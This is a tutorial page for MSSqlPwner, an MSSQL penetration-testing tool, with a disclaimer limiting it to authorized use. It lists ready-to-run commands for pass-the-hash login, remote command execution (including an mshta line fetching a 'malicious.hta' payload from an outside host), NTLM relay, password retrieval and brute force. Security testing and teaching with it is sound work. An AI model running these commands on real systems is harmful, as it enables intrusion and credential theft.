
MSSqlPwner - Powerful Tool for MSSQL Server Security Testing
Share
MSSqlPwner is a powerful penetration testing tool designed to exploit and assess the security of Microsoft SQL (MSSQL) servers.
Built on the Impacket framework, it supports authentication using clear-text passwords, NTLM hashes, and Kerberos tickets. This guide provides an overview of its features, installation, and usage.
Key Features of MSSqlPwner
-
Command Execution: Execute commands through methods such as xp_cmdshell, sp_oacreate, and custom assemblies.
-
Recursive Enumeration: Automatically enumerate linked servers and impersonation chains to identify potential attack paths.
-
NTLM Relay: Perform NTLM relay attacks using procedures like xp_dirtree, xp_subdirs, and xp_fileexist.
-
Lateral Movement: Explore linked servers and escalate privileges using discovered impersonation chains.
-
Authentication Methods: Supports Windows credentials, MSSQL credentials, NTLM hashes, and Kerberos tickets.
-
Brute Force: Test credentials against multiple hosts using tickets, hashes, or passwords.
Installation
MSSqlPwner can be installed directly from its GitHub repository. Choose one of the following methods:
Using pip
pip install 'mssqlpwner@git+https://github.com/ScorpionesLabs/MSSqlPwner.git'
Using pipx (Recommended)
pipx install 'git+https://github.com/ScorpionesLabs/MSSqlPwner.git'
Once installed, you can start using the tool with the command:
mssqlpwner -hashes ':0CB6948805F797BF2A82807973B89537' 'Administrator'@172.16.2.12 -windows-auth interactive
Usage Examples
Interactive Mode
Run MSSqlPwner interactively for live execution:
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive
Command Execution
Execute commands on the current server or linked servers:
# Execute "hostname" command on the current server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname
# Execute "hostname" command on a linked server (e.g., SRV01)
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname
# Use sp_oacreate to execute a malicious command on SRV01
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
NTLM Relay Attacks
Perform NTLM relay attacks to capture or relay credentials:
# Relay NTLM credentials to a target SMB server
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250
# Relay NTLM credentials using a specific chain ID
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id <CHAIN_ID> ntlm-relay 192.168.45.250
Direct Queries
Run SQL queries directly:
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER"
Password Retrieval
Retrieve passwords from linked servers:
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrieve-password
Brute Force
Test credentials against multiple hosts:
# Use tickets, hashes, and passwords for brute force attacks
mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt
# Use only hashes for brute force attacks
mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt
Advanced Functionalities
Chain Exploration
MSSqlPwner can identify impersonation chains to escalate privileges:
# Enumerate linked servers and impersonation chains
mssqlpwner corp.com/user:lab@192.168.1.65 enumerate
# Set a specific chain ID for execution in interactive mode
mssqlpwner corp.com/user:lab@192.168.1.65 set-chain <CHAIN_ID>
Custom Assembly Injection
Inject custom code into a linked server:
mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth inject-custom-asm SqlInject.dll
Notes on Security and Ethics
MSSqlPwner is intended for use by security professionals in authorized environments only, such as penetration testing engagements or security audits with proper permissions.
Unauthorized use of this tool may violate laws and ethical guidelines.
This guide provides a comprehensive overview of MSSqlPwner's capabilities and usage scenarios for MSSQL server assessments, lateral movement, and privilege escalation tasks in secure environments! You can learn more and Download MSSqlPwner in GitHub.
Upgrade Your Cybersecurity Skills EHA: Learn 150+ Practical Cyber Security Courses Online With Life Time Access - Enroll Here